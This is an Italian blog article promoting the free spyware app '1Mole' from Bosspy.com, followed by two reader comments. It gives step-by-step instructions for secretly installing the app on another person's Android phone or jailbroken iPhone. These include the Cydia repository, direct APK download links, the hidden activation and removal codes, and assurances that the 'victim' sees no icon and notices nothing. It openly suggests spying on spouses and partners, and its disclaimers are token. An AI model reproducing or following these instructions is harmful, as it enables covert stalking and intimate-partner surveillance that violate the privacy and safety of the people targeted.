Con 1Mole è possibile spiare gratis qualsiasi smartphone Android o iPhone in modo estremamente facile

Oggi vi presento un incredibile software per iPhone e Android.

Si chiama 1Mole e, lo dico subito, non so quanto sia legale. O meglio: se usato da un genitore per controllare il telefono di un figlio è legale, ma se usato da un marito/moglie per spiare il compagno, allora si rischia una denuncia.

Ad ogni modo l’articolo ha il solo scopo di segnalarvi l’esistenza di questo programma, visto che poi l’uso che ne fate dipende da voi. Assumetevi tutte le responsabilità per qualsiasi tipo di uso facciate con questo software spia per Android e iPhone.

Il programma che vi segnalo si chiama 1Mole. E’ totalmente gratuito, contrariamente a tanti altri software che esistono e che invece si fanno pagare a caro prezzo. 1Mole permette di spiare e controllare da remoto in modo estremamente facile e immediato qualsiasi smartphone Android e qualsiasi iPhone. Il suo utilizzo è davvero semplice: chiunque sarà in grado, grazie alla sua interfaccia estremamente chiara, di usare tutte le funzioni offerte da 1Mole.

Ma procediamo con calma.

Spiare Android e iPhone con un programma gratis: ecco 1Mole

Se volete spiare o controllare lo smartphone Android o l’iPhone di vostro figlio, moglie, marito, compagno, fidanzato o chiunque sia, 1Mole è il programma che fa al caso vostro.

E’ gratuito, discreto e facile da usare.

Si tratta di un nuovo programma spia per Android e iPhone che consente di spiare (scusate il gioco di parole) il telefono di una persona, che non si accorgerà assolutamente di niente. Una volta che avrete installato il programma 1Mole sul telefono della vittima che volete spiare, potrete controllare la sua posizione GPS, i suoi messaggi, il suo elenco chiamate, il tutto da remoto e senza che questo si accorga di niente.

Spiare Android e iPhone: come funziona 1Mole?

Usare 1Mole  è molto facile e immediato, come abbiamo detto. Vi basterà installarlo sullo smartphone Android o sull’iPhone della persona che volete spiare.

Tra le principali funzioni offerte da 1Mole, troviamo la possibilità di:

  • spiare chiamate e messaggi
  • spiare la posizione GPS 
  • spiare i siti web visitati e la cronologia del browser internet

il tutto direttamente da remoto, sfruttando l’interfaccia web offerta da 1Mole. 

Conosciamo nel dettaglio questo software spia per iPhone e Android.

Prima di tutto bisogna scaricare e installare 1Mole per Android e iPhone. Purtroppo per iPhone il programma funziona solo con il Jailbreak. Senza Jailbreak, dunque, 1Mole non funzionerà su iPhone.

Per scaricare e installare 1Mole, è necessario creare un account gratis sul sito Bosspy.com. Una volta fatta la registrazione, veloce e gratuita, il sito vi chiederà quale smartphone volete spiare. Se volete spiare un iPhone dovete scaricare 1Mole da Cydia, mentre se volete spiare un dispositivo Android dovete scaricare il file APK, copiarlo sul telefono Android e installarlo con un qualsiasi file manager.

Una volta installato 1Mole su iPhone o Android, avviate il programma facendo il login con i vostri dati utilizzati in precedenza sul sito Bosspy.com.

A questo punto, ora che avete anche installato il programma sul telefono che volete spiare, potete iniziare a controllare messaggi, chiamate, navigazione web e posizione GPS direttamente dal sito Bosspy.com.

L’interfaccia utente accessibile dal web è facilissima da usare. Sulla sinistra c’0è un menù completo che vi permette di accedere rapidamente a tutte le funzionalità offerte dal software.

Come potete notare, è possibile analizzare la posizione GPS dello smartphone che volete spiare, guardare in tempo reale il registro chiamate, i messaggi SMS e anche la navigazione internet dell’ignara vittima che volete spiare e controllare da remoto. Tutto molto semplice e immediato: anche gli utenti meno esperti riusciranno a usare questo servizio senza grosse difficoltà.

Ora che abbiamo visto cosa offre 1Mole, vediamo come installarlo su iPhone e Android senza difficoltà. 

Installare 1Mole su iPhone: ecco come fare

ATTENZIONE UTENTI IPHONE

Prima di installare 1mole, assicurarsi di aver attivato il codice di blocco sulla Lockscreen. Successivamente per installare il programma 1Mole dovrete aggiungere una nuova repository nell’applicazione Cydia: http://1mole.bosspy.com. Come abbiamo detto, serve il Jailbreak.

Dopo aver inserito la repo in Cydia, dovete cercare e installare il pacchetto 1mole.

Durante il processo di installazione, si apparirà una finestra di avviso prima che il vostro iDevice venga riavviato. Autorizzate il trattamento dei dati relativi alla localizzazione del iDevice per l’applicazione 1mole e riavviare il vostro iDevice.

A questo punto, dalla Lockscreen, digitare il seguente codice: 1199 per identificare voi stessi con l’account Bosspy. L0 Spyware 1mole sarà in questo modo attivato sull’iDevice e sarà assolutamente impercettibile per l’utente spiato, che non si accorgerà in alcun modo di essere spiato e controllato. Infatti, nè la repo nè il pacchetto installato appariranno in Cydia; inoltre nessuna icona apparirà sulla homescreen dell’iPhone. Sarà impossibile per la persona spiata scoprire che qualcuno sta controllando da remoto le sue attività.

Se volete disattivare il programma 1Mole da iPhone, dovete seguire questa procedura. Andate nella pagina di Spotlight (quella della ricerca, cioè quella più a sinistra), inserire il seguente codice nella barra di ricerca: 123456. Dopo la ricerca viene visualizzata la finestra di avviso che vi permette di rimuovere e disinstallare 1Mole da iPhone per smettere di spiare una persona.

Installare 1Mole su Android: ecco come fare

ATTENZIONE UTENTI ANDROID

Per installare 1Mole su Android dovete aprire il browser del vostro smartphone e andare a questo indirizzo se il dispositivo monta Android 2.x (http://www.bosspy.com/downloads/1mole_2x.apk) oppure a questo indirizzo se lo smartphone monta Android 4.x (http://bosspy.com/downloads/1mole_4x.apk).

Il file APK sarà scaricato. Cliccate sul file appena scaricato andando nella barra delle notifiche di sistema e aspettate che 1Mole sia installato sul dispositivo Android che volete spiare e controllare di nascosto. 

A questo punto 1Mole sarà installato sullo smartphone Android che volete spiare. Non vi accorgerete di niente, ma il software sarà installato.

Per richiamarlo e avviarlo, andate nella tastiera telefonica e digitate il numero 123456. Non avviate la chiamata, dopo aver digitato i numeri premete il pulsante di ricerca sullo smartphone.

A questo punto vi saranno chiesti i dati utente dell’account che avete creato in precedenza su Bosspy. Inseriteli e confermate.

Quindi uscite dall’applicazione per fare in modo che questa inizi ad inviare i dati sul web direttamente dallo smartphone, in modo che possiate spiare la vostra vittima senza che questa si accorga di niente.

In pratica, dopo che avrete installato l’applicazione sullo smartphone che volete spiare, non dovrete fare altro.

Aspettate 30 minuti dopo aver installato l’applicazione e potrete iniziare facilmente a spiare qualsiasi smartphone iPhone o Android, direttamente dal web e in modo completamente gratuito, facile, veloce e immediato. Non dovrete fare altro. Ricordiamo ancora una volta che la consultazione di vari dati è possibile direttamente sul web sul sito bosspy.com.

Volendo, poi, dalle impostazioni del software è anche possibile impostare l’intervallo di tempo per il recupero automatico dei dati.

Per maggiori informazioni potete visitare il sito Bosspy: 

http://www.bosspy.com/user/produits.aspx

Direi che è tutto. 1Mole è un programma davvero potente per spiare senza farsi scoprire qualsiasi smartphone Android o iPhone. 

Come abbiamo detto a inizio articolo, usatelo a vostro rischio e pericolo, assumendovi tutte le responsabilità del caso. Sappiate che spiare una persona senza la sua autorizzazione è assolutamente illegale e rischiate una denuncia. Fate molta attenzione a quello che fate! In questo articolo vi abbiamo solo segnalato l’esistenza di questo programma, sta a voi usarlo solo per scopi legali. Io ho testato il software sul mio telefono.

Se questa pagina di YourLifeUpdated.net ti è piaciuta e ti è stata d’aiuto, non perdere tempo, condividila sui social network! Clicca "Mi Piace" sulla pagina ufficiale di YourLifeUpdated su Facebook, seguici su Twitter Google+ per ricevere tante informazioni e consigli utili!

  • ileana

    ma rapporti normali no? spero che vi denuncino tutti

  • ambra

    ma se nel cellulare è installato un app antivirus il software si cancella. io ho preso una fregatura!!!!